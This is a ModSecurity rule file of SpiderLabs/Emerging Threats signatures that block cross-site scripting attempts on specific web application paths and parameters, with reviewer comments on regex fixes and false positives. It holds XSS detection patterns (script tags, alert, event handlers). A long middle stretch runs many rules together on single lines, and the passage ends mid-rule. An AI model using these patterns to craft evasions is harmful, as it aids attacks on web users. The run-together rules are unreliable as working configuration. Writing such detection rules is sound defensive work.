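SecRule REQUEST_LINE "@contains /search/list/action_search/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003906,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'"
    SecRule REQUEST_LINE "@contains form[" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003907) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- download.php id
# NOTE(review): the name regex is unanchored, so /XSS.*ARGS:id/ also counts
# TX entries for parameters whose name merely starts with "id".
SecRule REQUEST_LINE "@contains /modules/dl/download.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003907,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- download.php id',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'"
    SecRule &TX:'/XSS.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- download.php id',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Fix for rules 2003908-2003912: the TX selector is a regular expression, so
# the original 'form[cat]' was read as "form" followed by ONE character from
# the class {c,a,t}. It could never match a TX entry named after the literal
# parameter form[cat], so these rules did not fire for the parameter they
# were written for. The brackets are now matched literally with the
# single-character classes [[] and []]; this form is used instead of a
# backslash escape so the result does not depend on how backslashes survive
# the configuration quoting layers.
# rev is left unchanged here; bump it when applying this change.

# (2003908) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form cat
SecRule REQUEST_LINE "@contains /news/list/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003908,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form cat',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'"
    SecRule &TX:'/XSS.*ARGS:form[[]cat[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form cat',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003909) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form cat
SecRule REQUEST_LINE "@contains /action_create/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003909,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form cat',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'"
    SecRule &TX:'/XSS.*ARGS:form[[]cat[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form cat',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003910) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form name
SecRule REQUEST_LINE "@contains /action_create/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003910,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form name',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'"
    SecRule &TX:'/XSS.*ARGS:form[[]name[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form name',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003911) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form message
SecRule REQUEST_LINE "@contains /action_create/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003911,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form message',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'"
    SecRule &TX:'/XSS.*ARGS:form[[]message[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form message',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003912) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form mail
SecRule REQUEST_LINE "@contains /newsletter/create/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003912,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form mail',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23834'"
    SecRule &TX:'/XSS.*ARGS:form[[]mail[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACP3 XSS Attempt -- index.php form mail',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003886) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) XSS Attempt -- cp_authorization.php
SecRule REQUEST_LINE "@contains /shared/code/cp_authorization.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003886,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) XSS Attempt -- cp_authorization.php',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/1637'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) XSS Attempt -- cp_authorization.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003887) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) XSS Attempt -- cp_config.php
# NOTE(review): the action list of the chained rule below is on the next line of this listing.
SecRule REQUEST_LINE "@contains /shared/config/cp_config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003887,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) XSS Attempt -- cp_config.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23790'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" 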
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) XSS Attempt -- cp_config.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010862) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible APC Network Management Card Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /Forms/login" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010862,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible APC Network Management Card Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2009-1798'" SecRule &TX:'/XSS.*ARGS:login_username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible APC Network Management Card Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004594) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASP-Nuke XSS Attempt -- news.asp id SecRule REQUEST_LINE "@contains /news.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004594,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS ASP-Nuke XSS Attempt -- news.asp id',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24135'" SecRule &TX:'/XSS.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASP-Nuke XSS Attempt -- news.asp id',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003915) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Advanced Guestbook XSS Attempt -- picture.php picture SecRule REQUEST_LINE "@contains /picture.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003915,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Advanced Guestbook XSS Attempt -- picture.php picture',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23873'" SecRule &TX:'/XSS.*ARGS:picture/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Advanced Guestbook XSS Attempt -- picture.php picture',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010146) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /host-manager/html/add" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010146,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2008-1947'" SecRule &TX:'/XSS.*ARGS:method/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011114) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ARISg errmsg Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /Aris/wflogin.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011114,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ARISg errmsg Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,38441'" SecRule &TX:'/XSS.*ARGS:errmsg/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ARISg errmsg Parameter Cross Site Scripting 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010082) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible AWStats awstats.pl Cross-Site Scripting Attempt SecRule REQUEST_LINE "@contains /awstats/awstats.pl" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010082,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible AWStats awstats.pl Cross-Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2008-3714'" SecRule &TX:'/XSS.*ARGS:config/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible AWStats awstats.pl Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010147) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible bloofoxCMS 'search' Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /search.5.html" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010147,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible bloofoxCMS \'search\' Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36700/info'" SecRule &TX:'/XSS.*ARGS:search/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible bloofoxCMS \'search\' Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004583) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BoastMachine XSS Attempt -- index.php blog SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004583,rev:5,msg:'SLR: ET 
WEB_SPECIFIC_APPS BoastMachine XSS Attempt -- index.php blog',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24156'" SecRule &TX:'/XSS.*ARGS:blog/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BoastMachine XSS Attempt -- index.php blog',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CactuSoft Parodia XSS Attempt -- cand_login.asp strJobIDs SecRule REQUEST_LINE "@contains /cand_login.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004559,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS CactuSoft Parodia XSS Attempt -- cand_login.asp strJobIDs',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24078'" SecRule &TX:'/XSS.*ARGS:strJobIDs/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CactuSoft Parodia XSS Attempt -- cand_login.asp strJobIDs',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011054) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible CactuShop User Invoices Persistent XSS Attempt SecRule REQUEST_LINE "@contains _invoice.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011054,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible CactuShop User Invoices Persistent XSS Attempt',tag:'web-application-attack',tag:'cve,2010-1486'" SecRule REQUEST_LINE "@contains script>" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:(alert|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible CactuShop User Invoices Persistent XSS 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004569) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CandyPress Store XSS Attempt -- prodList.asp brand SecRule REQUEST_LINE "@contains /scripts/prodList.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004569,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CandyPress Store XSS Attempt -- prodList.asp brand',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25370'" SecRule &TX:'/XSS.*ARGS:brand/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CandyPress Store XSS Attempt -- prodList.asp brand',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004570) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CandyPress Store XSS Attempt -- prodList.asp Msg SecRule REQUEST_LINE "@contains /scripts/prodList.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004570,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CandyPress Store XSS Attempt -- prodList.asp Msg',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25370'" SecRule &TX:'/XSS.*ARGS:Msg/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CandyPress Store XSS Attempt -- prodList.asp Msg',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011676) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Cisco Collaboration Server LoginPage.jhtml Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /webline/html/admin/wcs/LoginPage.jhtml" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011676,rev:2,msg:'SLR: ET 
WEB_SPECIFIC_APPS Cisco Collaboration Server LoginPage.jhtml Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2010-0641'" SecRule &TX:'/XSS.*ARGS:dest/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Cisco Collaboration Server LoginPage.jhtml Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009590) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb edituser.php XSS attempt SecRule REQUEST_LINE "@contains /config/edituser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009590,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb edituser.php XSS attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/XSS.*ARGS:username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Citrix XenCenterWeb edituser.php XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009591) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb console.php XSS attempt SecRule REQUEST_LINE "@contains /console.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009591,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb console.php XSS attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/XSS.*ARGS:vmname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Citrix XenCenterWeb console.php XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009592) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb 
forcesd.php XSS attempt SecRule REQUEST_LINE "@contains /forcesd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009592,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb forcesd.php XSS attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/XSS.*ARGS:vmname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Citrix XenCenterWeb forcesd.php XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009593) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb forcerestart.php XSS attempt SecRule REQUEST_LINE "@contains /forcerestart.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009593,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Citrix XenCenterWeb forcerestart.php XSS attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/XSS.*ARGS:vmname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Citrix XenCenterWeb forcerestart.php XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004566) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php ticketID SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004566,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php ticketID',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24061'" SecRule &TX:'/XSS.*ARGS:ticketID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php 
ticketID',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004567) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php view SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004567,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php view',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24061'" SecRule &TX:'/XSS.*ARGS:view/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php view',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004568) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php fuse SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004568,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php fuse',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24061'" SecRule &TX:'/XSS.*ARGS:fuse/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClientExec (CE) XSS Attempt -- index.php fuse',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004591) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClonusWiki XSS Attempt -- index.php query SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004591,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS ClonusWiki XSS Attempt -- index.php 
query',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469230/100/0/threaded'"
    SecRule &TX:'/XSS.*ARGS:query/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClonusWiki XSS Attempt -- index.php query',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2010200) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Attempt
# Chain: the request line must contain the smpwservices.fcc path, then the
# query string or request body must contain any one of the listed keywords.
# NOTE(review): the keyword list is a bare substring match (script, img, src,
# alert, on* handler prefixes) with no surrounding markup, so ordinary values
# containing e.g. "src" or "img" satisfy it. Expect false positives on this
# path; it adds tx.critical_anomaly_score, so review the blocking threshold
# before enabling it in enforcement mode.
# NOTE(review): "@contains" is case-sensitive and no t:lowercase is applied to
# REQUEST_LINE, so a differently-cased path would not match -- confirm how the
# protected server treats path case.
SecRule REQUEST_LINE "@contains /siteminderagent/forms/smpwservices.fcc" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010200,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/26375/info'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011152) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Consona Products n6plugindestructor.asp Cross Site Scripting Attempt
# Chain: path match on REQUEST_LINE, then at least one TX variable whose name
# matches /XSS.*ARGS:backurl/ must exist. The rest of the chained rule's
# action list continues on the next line of this listing.
SecRule REQUEST_LINE "@contains /verify/asp/n6plugindestructor.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011152,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Consona Products n6plugindestructor.asp Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,39999'"
    SecRule &TX:'/XSS.*ARGS:backurl/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Consona Products 
